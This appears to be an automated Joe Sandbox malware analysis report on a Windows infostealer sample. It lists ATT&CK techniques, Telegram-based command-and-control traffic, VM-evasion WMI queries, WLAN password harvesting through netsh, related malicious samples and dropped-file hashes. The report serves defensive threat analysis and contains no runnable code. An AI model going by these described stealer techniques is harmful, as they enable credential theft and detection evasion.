Persistence: 1 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 111 Disable or Modify Tools; 641 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; Compile After Delivery
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 931 Security Software Discovery; 641 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 134 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Email Collection; 1 Archive Collected Data; 2 Data from Local System; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

Behavior graph (text form of the graph; counts after a process name are the node counts shown on the graph)

Behavior Graph ID: 1576963 | Sample: zyEDYRU0jw.exe | Startdate: 17/12/2024 | Architecture: WINDOWS | Score: 100
DNS/IP at start: api.telegram.org; 238.14.8.0.in-addr.arpa; icanhazip.com
Signatures at start: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 7 other signatures
api.telegram.org -> signature: Uses the Telegram API (likely for C&C communication)
zyEDYRU0jw.exe (started; 15 31)
  DNS/IP: api.telegram.org 149.154.167.220, 443, 49708 TELEGRAMRU United Kingdom; icanhazip.com 104.16.184.241, 49704, 80 CLOUDFLARENETUS United States
  Signatures: Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines); Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines); Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines); 11 other signatures
  cmd.exe (started; 1)
    Signatures: Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
    Children: netsh.exe (started; 2); conhost.exe (started); findstr.exe (started; 1); chcp.com (started; 1)
  WerFault.exe (started; 19 16)
    Dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode
  cmd.exe (started; 1)
    Children: taskkill.exe (started; 1); conhost.exe (started); 2 other processes
  cmd.exe (started; 1)
    Children: tasklist.exe (started; 1); conhost.exe (started)

Source | Detection | Scanner | Label | Link
zyEDYRU0jw.exe | 63% | ReversingLabs | ByteCode-MSIL.Infostealer.Polazert |
zyEDYRU0jw.exe | 100% | Avira | HEUR/AGEN.1307083 |
zyEDYRU0jw.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep | 0% | Avira URL Cloud | safe |
https://x.com-https://ads.google.com-https://pay.google.com | 0% | Avira URL Cloud | safe |
https://mega.nz%https://roblox.com%https://cpanel.net | 0% | Avira URL Cloud | safe |
https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github. | 0% | Avira URL Cloud | safe |
http://api.telegram.orgd | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high
icanhazip.com | 104.16.184.241 | true | false | | high
238.14.8.0.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://icanhazip.com/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | false | | high
https://duckduckgo.com/chrome_newtab | tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | false | | high
https://duckduckgo.com/ac/?q= | tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | false | | high
https://x.com-https://ads.google.com-https://pay.google.com | zyEDYRU0jw.exe | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep | zyEDYRU0jw.exe | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | false | | high
https://api.telegram.org/bot | zyEDYRU0jw.exe | false | | high
https://mega.nz%https://roblox.com%https://cpanel.net | zyEDYRU0jw.exe | false | Avira URL Cloud: safe | unknown
https://ozon.ru | zyEDYRU0jw.exe | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | false | | high
http://upx.sf.net | Amcache.hve.19.dr | false | | high
http://api.telegram.orgd | zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | false | | high
https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github. | zyEDYRU0jw.exe | false | Avira URL Cloud: safe | unknown
http://icanhazip.com | zyEDYRU0jw.exe | false | | high
http://api.telegram.org | zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | false | | high
https://ipinfo.io/# | zyEDYRU0jw.exe | false | | high
https://gmail.com | zyEDYRU0jw.exe | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false
104.16.184.241 | icanhazip.com | United States | | 13335 | CLOUDFLARENETUS | false
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1576963
                                                                    Start date and time:2024-12-17 19:46:05 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 43s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:22
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:zyEDYRU0jw.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@25/20@3/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 42
                                                                    • Number of non-executed functions: 8
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.21, 23.218.208.109, 13.107.246.63, 4.175.87.197, 20.190.147.2
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: zyEDYRU0jw.exe
Time | Type | Description
13:47:07 | API Interceptor | 73x Sleep call for process: zyEDYRU0jw.exe modified
13:47:43 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | ugpJX5h56S.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
 | 87h216Snb7.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
 | dP5z8RpEyQ.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
 | Ls4O6Pmixd.exe | Get hash | malicious | Phemedrone Stealer | Browse |
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
 | PAYMENT ADVICE TT07180016-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
 | pre-stowage.PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
 | Order129845.exe | Get hash | malicious | AgentTesla | Browse |
 | PURCHASE ORDER TRC-0909718-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
104.16.184.241 | itLDZwgFNE.exe | Get hash | malicious | Flesh Stealer | Browse | icanhazip.com/
 | 3gJQoqWpxb.bat | Get hash | malicious | Unknown | Browse | icanhazip.com/
 | 7fE6IkvYWf.exe | Get hash | malicious | Unknown | Browse | icanhazip.com/
 | T05Dk6G8fg.exe | Get hash | malicious | Unknown | Browse | icanhazip.com/
 | VaXmr82RIb.exe | Get hash | malicious | Unknown | Browse | icanhazip.com/
 | Pdf Reader.exe | Get hash | malicious | Stealerium | Browse | icanhazip.com/
 | gKWbina3a4.bat | Get hash | malicious | Stealerium | Browse | icanhazip.com/
 | uyz4YPUyc9.exe | Get hash | malicious | Stealerium | Browse | icanhazip.com/
 | yv7QsAR49V.exe | Get hash | malicious | Stealerium | Browse | icanhazip.com/
 | 5E3zWXveDN.exe | Get hash | malicious | Stealerium | Browse | icanhazip.com/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
icanhazip.com | itLDZwgFNE.exe | Get hash | malicious | Flesh Stealer | Browse | 104.16.184.241
 | 3gJQoqWpxb.bat | Get hash | malicious | Unknown | Browse | 104.16.184.241
 | CVmkXJ7e0a.exe | Get hash | malicious | SheetRat | Browse | 104.16.185.241
 | file.exe | Get hash | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT | Browse | 104.16.185.241
 | file.exe | Get hash | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | Browse | 104.16.185.241
 | 7fE6IkvYWf.exe | Get hash | malicious | Unknown | Browse | 104.16.184.241
 | iGxCM2I5u9.exe | Get hash | malicious | Flesh Stealer | Browse | 104.16.185.241
 | T05Dk6G8fg.exe | Get hash | malicious | Unknown | Browse | 104.16.184.241
 | 3K5MXGVOJE.exe | Get hash | malicious | Unknown | Browse | 104.16.185.241
 | VaXmr82RIb.exe | Get hash | malicious | Unknown | Browse | 104.16.184.241
api.telegram.org | ugpJX5h56S.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | 87h216Snb7.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
 | dP5z8RpEyQ.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
 | Ls4O6Pmixd.exe | Get hash | malicious | Phemedrone Stealer | Browse | 149.154.167.220
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | PAYMENT ADVICE TT07180016-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
 | pre-stowage.PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | Order129845.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
 | PURCHASE ORDER TRC-0909718-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | Setup.msi | Get hash | malicious | Vidar | Browse | 149.154.167.99
 | ugpJX5h56S.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | 87h216Snb7.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
 | dP5z8RpEyQ.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
 | Ls4O6Pmixd.exe | Get hash | malicious | Phemedrone Stealer | Browse | 149.154.167.220
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | PAYMENT ADVICE TT07180016-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
 | pre-stowage.PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | 69633f.msi | Get hash | malicious | Vidar | Browse | 149.154.167.99
CLOUDFLARENETUS | hngarm13de02.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 172.65.251.78
 | http://kmaybelsrka.sbs:6793/bab.zip | Get hash | malicious | Unknown | Browse | 1.1.1.1
 | CapCut_12.0.4_Installer.exe | Get hash | malicious | LummaC Stealer | Browse | 172.64.41.3
 | https://garfieldthecat.tech/Receipt.html | Get hash | malicious | WinSearchAbuse | Browse | 162.159.61.3
 | CapCut_12.0.4_Installer.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.2.110
 | Documento_Contrato_Seguro_18951492.msi | Get hash | malicious | AteraAgent | Browse | 104.18.21.76
 | Documento_Contrato_Seguro_25105476.msi | Get hash | malicious | AteraAgent | Browse | 104.18.21.76
 | http://sharefileon.com | Get hash | malicious | Unknown | Browse | 104.17.25.14
 | http://www.kukaj-to.chat/sedo | Get hash | malicious | Unknown | Browse | 104.21.50.223
 | 5j0fix05fy.js | Get hash | malicious | NetSupport RAT | Browse | 104.26.0.231
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | hngarm13de02.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 149.154.167.220
 | http://escrowmedifllc.hostconstructionapp.com | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | BBVA S.A..vbs | Get hash | malicious | Remcos | Browse | 149.154.167.220
 | ugpJX5h56S.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | 87h216Snb7.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
 | 174 Power Global_Enrollment_.docx.doc | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | mjjt5kTb4o.lnk | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | 122046760.bat | Get hash | malicious | RHADAMANTHYS | Browse | 149.154.167.220
 | pkqLAMAv96.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 149.154.167.220
 | IIC0XbKFjS.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 149.154.167.220
                                                                                        No context
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.4632419396097684
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:HdXBOipYQNEex0WbkzhnaOKymScZlEZrLOdzuiFrZ24IO85H+:1BNHaWbkdasmX0KzuiFrY4IO8Z+
                                                                                        MD5:5770C42AACDA0340AEDB026247E6C054
                                                                                        SHA1:FBC86602A1EA83E16C14CC8F56AD2425941D9714
                                                                                        SHA-256:F68FCBD7A4777CF64FC6C7130BB2846CEBEF2F1874F990F73516957ACD55B09E
                                                                                        SHA-512:1D07E8AF4C3F5AB92E5509B4E5FDE94E57D240769F70A8C9E3AD07ECAA71BCC620594B65FAB789176D316CEF9FBFE93EA27DB024C46E09FDC676A616FDF4A1B7
                                                                                        Malicious:true
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.3.4.8.3.6.5.7.2.4.4.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.3.4.8.3.7.6.6.6.1.9.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.9.d.7.0.4.5.-.0.f.6.9.-.4.f.9.3.-.9.2.b.8.-.b.4.9.f.0.c.4.a.d.2.e.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.c.2.2.4.4.8.-.d.5.0.8.-.4.4.8.a.-.9.4.7.6.-.e.e.0.5.5.d.5.e.d.5.4.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.y.E.D.Y.R.U.0.j.w...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.4.8.-.0.0.0.1.-.0.0.1.4.-.f.7.1.9.-.d.c.0.c.b.4.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.d.4.2.e.3.c.5.f.c.2.4.e.3.0.9.5.8.1.8.1.9.c.b.a.7.2.3.b.1.4.c.3.c.2.4.7.d.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Dec 17 18:47:17 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):236102
                                                                                        Entropy (8bit):4.040330280132799
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:V798g4uEqDNZLTg8ynECYypx+cCd562+zhz:V72g4KTg8ynkyibIpd
                                                                                        MD5:32E70EE5E371EFF1D91CFA2F8DE08D20
                                                                                        SHA1:8FEACFCDDB7FAC94114584CA1201CD11924F6702
                                                                                        SHA-256:8B2AD04155269C5340CC175204926DC4BB9A5A49E43D8B669A684BEC3C41634B
                                                                                        SHA-512:4451EA1212386D3ADDE79BECD333B1AC97189AA9416E0E47B1A160C1B81057E94B2B18AC24FDEF7E2D7E869995C74CC003B9A92F34735675441F9BF3DA75C6CF
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .......5.ag............4............0..H.......<...d7......$!..rK..........`.......8...........T...........`}...............7...........9..............................................................................eJ......$:......GenuineIntel............T.......H...!.ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8372
                                                                                        Entropy (8bit):3.689677835283867
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJmk26C6YEIjSUuvgmfZqqJpDj89b/qsfDVm:R6lXJs6C6YEsSUuvgmfPI/Jfs
                                                                                        MD5:A607CD7770F05EEFA08A44C199935BD2
                                                                                        SHA1:6D10F69B95C433753B3928E36881270250CC10EF
                                                                                        SHA-256:89089684FEDC25489A2F0FAFEC6C2B5632AB0C9F636AD24F71D1BC5B180176A9
                                                                                        SHA-512:2BE19C383864B540A031D34ACAF2C99E3612ED7A179E40CACA511BCAA53E65D5129DC9E7ADA52CE81962966A2B4C3F6BFAC8B09F15425BB99950D2341933921A
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.5.2.<./.P.i.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4714
                                                                                        Entropy (8bit):4.461629771827499
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsTJg77aI9dSWpW8VYBPYm8M4JmpMPFrI+q8vrpMxImLNegi5d:uIjftI7zz7VKSJ6KuImLNegYd
                                                                                        MD5:01A775D12581D222292CB9F3A56795C2
                                                                                        SHA1:61F4D9A296D2482BB8CE017902942994D0345D5B
                                                                                        SHA-256:8208B089C2F0EC142A6F4C710D8753AC05B903BBD1B423A65E519AB0D5869979
                                                                                        SHA-512:6C80A6D7862142EBE5E5DB1223457D162590B95BFB5B2ABA67EBD81C0C0FAC57E3BDB7BA1A5FA8CA81007860E943821D0AEE918DCD096B054AA3384D4E5EE68C
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="635629" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):601365
                                                                                        Entropy (8bit):6.008791134195978
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:l11e8OdHB+LeuC6MeAOXw6VwIHDIu62IPXjHf:lTenHw1C6MqgIDjyPT/
                                                                                        MD5:174BC06D568819E002A136E848701847
                                                                                        SHA1:DECE64C7FC14E7F0D9EF0ACFEF61D2E251242E85
                                                                                        SHA-256:0BD2C19EA8665923BD8DD8D3992BBB2DB9B958B46CAACAD84DC5E03C258C7EB1
                                                                                        SHA-512:17F4EAEC278BD8A8FB23FEA92D7F698379132F46CA2C6A97003EA30A4E27F411BDD9A26FDA585499208EFEA25D6C23375EB9857EC5B699D84CE934F91F7B9A9B
                                                                                        Malicious:false
                                                                                        Preview:{"browser":{"first_run_finished":true,"first_run_study_group":"EnabledE-5","shortcut_migration_version":"117.0.5938.132"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.696426810068423e+12,"network":1.69642681e+12,"ticks":423833625.0,"uncertainty":2034246.0}},"os_crypt":{"app_bound_fixed_data":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAG7I4XamucEiJgTIvWNrX8QAAAAACAAAAAAAQZgAAAAEAACAAAABcByHmkJWMthaaF6PAj44r6G5q8HbZMYQ78KiV7ktVmQAAAAAOgAAAAAIAACAAAAA7QovYWUH9jKwer+mATh0d48meKRQtltSX16XxxPWWA2ABAAC4ore7HQTXddwLyE2jwNV/4ftVW9+MWocSg5WPR1FRhkd6090OQ8PyZLBU3Rc+zrrowkC6sKrTpTldlSWYMhzsNLXud9KDCMJbKu4celgfQ0Xli7lHCLEZtJdZB7XRZLdPzIA7yCELaNh0Tzk8tAn7OkKs/GwqTXg/0IRrDQwRjtlhpS2MXt4c7Nip//L0neEWgM2K6pW7nC6hZt+1PTTJQd1HLQI25gileFmmT7iZTmDbfhwI65gCxAbSmasdgEWMsLDPxtgVj1AgzCFIDTXul8NsIYjviDd1l7pez16jtmwELJT2bRUZ0
